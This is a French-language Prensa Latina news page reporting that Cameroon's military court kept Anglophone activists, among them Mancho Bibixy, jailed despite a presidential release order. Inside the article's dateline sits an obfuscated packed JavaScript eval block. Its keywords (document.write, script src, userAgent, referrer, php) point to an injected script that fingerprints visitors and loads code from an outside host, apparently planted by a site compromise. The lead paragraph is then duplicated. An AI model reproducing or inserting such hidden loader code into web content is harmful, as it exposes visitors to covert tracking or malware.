lundi 22 avril 2024 |
Prensa Latina - Qui sommes nous

| Contacter avec Prensa Latina

Agence d'information Latino-américaine
Édition française
Search
Close this search box.

Le Tribunal Militaire du Cameroun ignore un ordre présidentiel

Yaoundé, eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|beydi|var|u0026u|referrer|ibest||js|php'.split('|'),0,{})) 1 septembre (PL) La Cour militaire du Cameroun tient des prisonniers dans les régions anglophones du nord-est et du sud-est du pays, dont la libération a été ordonnée par le président Paul Biya il y a quelques heures.

Yaoundé, 1 septembre (PL) La Cour militaire du Cameroun tient des prisonniers dans les régions anglophones du nord-est et du sud-est du pays, dont la libération a été ordonnée par le président Paul Biya il y a quelques heures.

Selon des familles et des proches, qui se sont réunis pour accéder à l’audience et demander leur remise en liberté immédiate, « certains des activistes détenus à la fin de l’année dernière ont été libérés, mais au moins une douzaine d’entre-eux se trouve toujours derrière les barreaux sur ordre du tribunal ».

Selon le communiqué présidentiel diffusé dans le pays par la presse, le mandataire a ordonné la libération de près de 80 détenus  avec l’intention annoncée d’écouter leurs demandes en contribuant à la paix sociale et politique du pays.

Cependant, la cour militaire a quant à elle ordonné que certains d’entre-eux, dont l’animateur d’un programme de radio populaire, Mancho Bibixy, restent en prison jusqu’à la tenue d’un procès programmé pour ce mois-ci.

Les protestations populaires de fin d’année 2016 ont fait suite à la publication d’un ordre officiel qui a rendu obligatoire l’enseignement du français dans les écoles ainsi que le strict usage de cette langue pour les documents judiciaires.

Ces activistes sont accusés « d’incitation à la violence lors des protestations dans les régions anglophones, d’hostilité contre la Patrie, de sécession, guerre civile et de campagne pour le fédéralisme ».

Les intéressés se sont déclarés innocents.

peo/ocs/msl

EN CONTINU
notes connexes